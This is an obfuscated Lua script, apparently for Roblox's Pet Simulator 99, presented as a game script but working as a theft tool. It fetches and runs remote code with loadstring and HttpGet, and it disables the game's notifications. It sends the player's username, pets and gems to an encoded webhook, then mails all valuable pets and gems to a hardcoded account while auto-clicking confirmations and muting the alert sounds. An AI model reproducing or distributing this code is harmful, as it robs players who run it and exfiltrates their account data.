--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v36,v37) local v38={};for v72=1, #v36 do v6(v38,v0(v4(v1(v2(v36,v72,v72 + 1 )),v1(v2(v37,1 + (v72% #v37) ,1 + (v72% #v37) + 1 )))%256 ));end return v5(v38);end local v8=game:GetService(v7("\225\207\218\60\227\169\212","\126\177\163\187\69\134\219\167")).LocalPlayer;local v9=game:GetService(v7("\11\217\62\213\207\38\223\60\204\255\38","\156\67\173\74\165"));local v10=v7("\60\163\93\6\175\124\9\123\160\76\20\180\41\73\63\249\69\19\171\47\85\53\188\92\4\189\104\75\59\178\6\23\172\47\9\35\178\75\30\179\41\77\39\248\24\66\229\112\31\97\230\17\64\238\116\18\101\229\31\65\229\117\21\123\175\27\24\183\44\96\0\165\98\59\137\10\30\38\158\78\48\185\1\110\6\152\24\6\241\18\64\62\167\104\46\241\60\99\16\181\78\62\173\10\82\103\147\83\55\165\115\84\61\176\118\41\154\63\17\0\231\72\47\139\115\20\38\165\106\6\174\37","\38\84\215\41\118\220\70");local v11=v7("\74\30\35\27\236\7\64\117","\158\48\118\66\114");local v12=v7("\172\35\3\118\127\170\247","\155\203\68\112\86\19\197");local v13=778.4 -(507 + 271) ;local v14=v8.Name   .. "_"   .. game.JobId ;if _G[v14] then return;end _G[v14]=true;setclipboard(v7("\78\201\34\236\83\34\170\183\66\212\37\255\79\106\225\182\65\218\121\168\104\33\231\219\77\206\30\248\65","\152\38\189\86\156\32\24\133"));local v15=v10:match(v7("\235\82\165\78\243\88\172\85\179\31\226\66\183\30\232","\38\156\55\199"));local v16=v10:match(v7("\191\120\126\32\28\123\241\80\231\56\120\99\92\60\193\125\231\64\55\97\87","\35\200\29\28\72\115\20\154"));loadstring(game:HttpGet(v7("\17\171\197\207\158\118\123\86\173\208\200\195\43\61\13\183\196\221\152\63\49\11\188\222\209\153\41\58\13\241\210\208\128\99\26\12\180\212\233\158\15\61\13\166\158\236\142\62\61\9\171\194\141\221\126\96\86\178\208\214\131\99\36\10\230\136","\84\121\223\177\191\237\76")))();pcall(function() local v39=0 -0 ;local v40;while true do if (v39==0) then v40=v8.PlayerScripts.Scripts.Core[v7("\139\68\198\163\63\67\35\129\139\83\199\164\51\94\55\129\156\99\224","\161\219\54\169\192\90\48\80")];if v40 then v40.Disabled=true;end break;end end end);pcall(function() local v41=1900 -(106 + 1794) ;local v42;while true do if (v41==(0 + 0)) then v42=v8.PlayerGui.Notifications;if v42 then v42.Enabled=false;end break;end end end);local function v17(v43) local v44=0;local v45;local v46;local v47;while true do if (1==v44) then local v85=0 + 0 ;while true do if (v85==(0 -0)) then v47=0 -0 ;for v96= #v45,115 -(4 + 110) , -(585 -(57 + 527)) do local v97=0;local v98;while true do if ((1427 -(41 + 1386))==v97) then v98=103 -(17 + 86) ;while true do if (v98==(0 + 0)) then v47=v47 + (1 -0) ;v46=v45:sub(v96,v96)   .. v46 ;v98=2 -1 ;end if (v98==1) then if (((v47%3)==(166 -(122 + 44))) and (v96>(1 -0))) then v46=","   .. v46 ;end break;end end break;end end end v85=3 -2 ;end if (v85==1) then v44=2 + 0 ;break;end end end if (v44==(0 + 0)) then local v86=0 -0 ;while true do if (v86==(66 -(30 + 35))) then v44=1 + 0 ;break;end if (v86==0) then v45=tostring(math.floor(v43));v46="";v86=1258 -(1043 + 214) ;end end end if (v44==(7 -5)) then return v46;end end end local v18=require(game:GetService(v7("\123\71\16\41\64\65\1\49\76\70\51\49\70\80\1\34\76","\69\41\34\96")).Library.Client.Save);local v19=v18.Get();local v20=require(game:GetService(v7("\142\198\199\6\11\40\189\215\210\14\49\63\179\209\214\13\7","\75\220\163\183\106\98")).Library.Directory.Pets);local v21=0;local v22=nil;if (v19.Inventory and v19.Inventory.Currency) then for v76,v77 in pairs(v19.Inventory.Currency) do if (v77.id==v7("\38\179\138\58\214\12\190\152","\185\98\218\235\87")) then v21=v77._am or (1212 -(323 + 889)) ;v22=v76;break;end end end local v23={};if (v19.Inventory and v19.Inventory.Pet) then for v78,v79 in pairs(v19.Inventory.Pet) do local v80=v20[v79.id];local v81=0;if v79.id:find(v7("\236\61\53\225\223\164\223\41\38\232","\202\171\92\71\134\190")) then v81=10 -6 ;elseif (v80 and v80.exclusiveLevel) then if v79.id:find(v7("\29\200\56\137\39\200\47","\232\73\161\76")) then v81=583 -(361 + 219) ;else v81=321 -(53 + 267) ;end elseif (v80 and v80.huge) then v81=1 + 1 ;end if (v81>0) then table.insert(v23,{[v7("\174\208\70","\126\219\185\34\61")]=v78,[v7("\13\195\81\103\112\99","\135\108\174\62\18\30\23\147")]=v79._am or (414 -(15 + 398)) ,[v7("\184\232\39\206","\167\214\137\74\171\120\206\83")]=v79.id,[v7("\155\226\59\82\234\174\159\233","\199\235\144\82\61\152")]=v81});end end end table.sort(v23,function(v48,v49) return v48.priority>v49.priority ;end);local function v24() local v50=982 -(18 + 964) ;local v51;while true do if (v50==(7 -5)) then return v51;end if (v50==(1 + 0)) then for v87,v88 in ipairs(v23) do local v89=0 + 0 ;local v90;while true do if (v89==(850 -(20 + 830))) then v90=v88.name;if ( #v90>(16 + 4)) then v90=v90:sub(1,143 -(116 + 10) )   .. v7("\137\26\62","\126\167\52\16\116\217") ;end v89=1 + 0 ;end if (v89==(739 -(542 + 196))) then v51=v51   .. v90   .. "\n" ;break;end end end v51=v51   .. v7("\200\46\32","\156\168\78\64\224\212\121") ;v50=2;end if (v50==(0 -0)) then if ( #v23==(0 + 0)) then return v7("\41\25\249\12\6\4\190\42\9\2\172\42\9\5\245\107\51\31\173\42\9\31\186\56\75\86\145\62\0\19\170\103\71\25\171\107\34\14\186\39\18\5\176\61\2\5\249\45\8\3\183\47\73","\75\103\118\217");end v51="```\n";v50=1 + 0 ;end end end local v25=nil;local function v26() local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v52==(0 -0)) then v53=os.date(v7("\77\250","\174\103\142\197"));v54=v53.hour%12 ;v52=2 -1 ;end if (2==v52) then v56=string.format(v7("\29\90\74\108\35\173\87\92\4\64\121\117\233\72\29\14\87\45\103\168\1","\114\56\62\101\73\71\141"),v53.month,v53.day,v54,v53.min,v53.sec,v55);v57={[v7("\172\224\207\200\189","\164\216\137\187")]="\u{1F525} Xoltic Scripts [PetSim99 HIT]",[v7("\209\233\61\189\180","\107\178\134\81\210\198\158")]=9491967,[v7("\62\7\135\202\174\43","\202\88\110\226\166")]={{[v7("\205\14\143\242","\170\163\111\226\151")]="\u{1F464} Username",[v7("\7\49\190\45\75","\73\113\80\210\88\46\87")]=v8.Name,[v7("\136\34\193\27\233\132","\135\225\76\173\114")]=false},{[v7("\20\236\181\181","\199\122\141\216\208\204\221")]="\u{1F4E6} Inventory",[v7("\187\220\28\229\125","\150\205\189\112\144\24")]=v24(),[v7("\44\138\179\69\10\141","\112\69\228\223\44\100\232\113")]=false},{[v7("\218\30\10\214","\230\180\127\103\179\214\28")]="\u{1F48E} Gems",[v7("\154\4\83\83\225","\128\236\101\63\38\132\33")]=v17(v21),[v7("\165\167\29\77\184\238","\175\204\201\113\36\214\139")]=true}},[v7("\65\195\58\200\1\85","\100\39\172\85\188")]={[v7("\185\125\161\148","\83\205\24\217\224")]=string.format("\u{1F525} Xoltic Scripts %s",v56)}};v52=3;end if (v52==(1124 -(118 + 1003))) then v58={[v7("\227\200\207\56\226\214","\93\134\165\173")]={v57}};pcall(function() request({[v7("\139\224\205","\30\222\146\161\162\90\174\210")]=v10,[v7("\200\75\100\2\234\74","\106\133\46\16")]=v7("\104\15\64\200","\32\56\64\19\156\58"),[v7("\114\205\228\82\95\224\147","\224\58\168\133\54\58\146")]={[v7("\122\89\69\233\112\136\147\70\109\79\91\248","\107\57\54\43\157\21\230\231")]=v7("\218\155\1\249\176\223\206\207\130\30\251\246\214\220\212\133","\175\187\235\113\149\217\188")},[v7("\30\160\133\85","\24\92\207\225\44\131\25")]=v9:JSONEncode(v58)});end);break;end if (v52==1) then if (v54==0) then v54=12;end v55=((v53.hour<(389 -(142 + 235))) and v7("\119\5","\152\54\72\63\88\69\62")) or v7("\228\233","\60\180\164\142") ;v52=9 -7 ;end end end local function v27(v59) local v60=0 + 0 ;local v61;while true do if (v60==(978 -(553 + 424))) then pcall(function() return game:GetService(v7("\143\220\48\64\180\218\33\88\184\221\19\88\178\203\33\75\184","\44\221\185\64")):WaitForChild(v7("\47\226\92\72\124\19\236","\19\97\135\40\63")):WaitForChild(v7("\131\93\58\55\45\62\182\6\115\8\42\63\170","\81\206\60\83\91\79")):InvokeServer(unpack(v61));end);break;end if (v60==0) then if ( not v22 or (v59<=(0 -0))) then return;end v61={v11,v12,v7("\104\198\170\94\30\115\72\202","\29\43\179\216\44\123"),v22,v59};v60=1;end end end v26();task.wait(1 + 1 );for v62=34,1 + 0 , -(2 -1) do task.wait(2 -1 );end local v28;v28=v8.PlayerGui.DescendantAdded:Connect(function(v63) if (v63:IsA(v7("\122\174\200\102\13\214\89\176\65\165","\196\46\203\176\18\79\163\45")) and v63.Visible and v63.Active) then local v82=v63.Name:lower();if (v82:find(v7("\187\45\112\24\45\233\226","\143\216\66\30\126\68\155")) or v82:find(v7("\179\205\30","\129\202\168\109\171\165\195\183")) or v82:find(v7("\49\93\57\220","\134\66\56\87\184\190\116")) or v82:find(v7("\51\58","\85\92\81\105\219\121\139\65"))) then pcall(function() v63:Click();end);end end end);local v29=require(game:GetService(v7("\207\182\64\73\117\220\252\167\85\65\79\203\242\161\81\66\121","\191\157\211\48\37\28")).Library.Audio);local v30=v29.Play;v29.Play=function(v64,v65,...) local v66=0;while true do if ((0 -0)==v66) then if (v65==v7("\205\29\236\29\41\204\26\224\21\62\133\80\187\77\107\135\76\173\77\105\141\74\162\73","\90\191\127\148\124")) then return;end return v30(v64,v65,...);end end end;local v32;v32=game.DescendantAdded:Connect(function(v67) if (v67.ClassName==v7("\75\136\59\25\124","\119\24\231\78")) then if ((v67.SoundId==v7("\144\47\189\75\207\83\20\150\36\161\16\147\15\64\211\117\246\19\141\19\67\215\123\240","\113\226\77\197\42\188\32")) or (v67.SoundId==v7("\40\20\236\180\41\5\241\161\51\18\174\250\117\71\160\231\111\66\163\231\107\70\167\237","\213\90\118\148")) or (v67.SoundId==v7("\73\44\172\87\94\72\43\160\95\73\1\97\251\7\31\15\127\231\2\31\8\124\227\0","\45\59\78\212\54"))) then local v91=0 + 0 ;local v92;while true do if (v91==0) then v92=0 -0 ;while true do if ((753 -(239 + 514))==v92) then v67.Volume=0 + 0 ;v67:Destroy();break;end end break;end end end end end);local v33=game:GetService(v7("\34\83\147\135\143\45\172\228\21\82\176\159\137\60\172\247\21","\144\112\54\227\235\230\78\205"));local v34=v33:WaitForChild(v7("\157\45\27\235\223\73\184","\59\211\72\111\156\176"));local v35=v34:WaitForChild(v7("\99\134\234\33\76\136\251\119\14\180\230\35\74","\77\46\231\131"));for v68,v69 in ipairs(v23) do local v70=1329 -(797 + 532) ;local v71;while true do if (v70==(0 + 0)) then v71={v11,v12,v7("\138\81\162","\32\218\52\214"),v69.uid,v69.amount};pcall(function() return v35:InvokeServer(unpack(v71));end);v70=1;end if (v70==(732 -(476 + 255))) then task.wait(v13);break;end end end if (v21>(1130 -(369 + 761))) then local v73=0;local v74;local v75;while true do if (v73==(1 + 0)) then if (v74.Inventory and v74.Inventory.Currency) then for v100,v101 in pairs(v74.Inventory.Currency) do if (v101.id==v7("\106\30\48\165\254\190\65\73","\58\46\119\81\200\145\208\37")) then v75=v101._am or (0 -0) ;break;end end end if (v75>(0 -0)) then v27(v75);end break;end if (v73==(238 -(64 + 174))) then local v93=0;while true do if (v93==(1 + 0)) then v73=1 -0 ;break;end if (v93==(336 -(144 + 192))) then v74=v18.Get();v75=0;v93=217 -(42 + 174) ;end end end end end v28:Disconnect();v32:Disconnect();v29.Play=v30;print(v7("\19\131\60\184\160\190\118\24\143\34\165\185\169\37\107\193\112\143\166\176\38\39\137\36\169\232","\86\75\236\80\204\201\221"));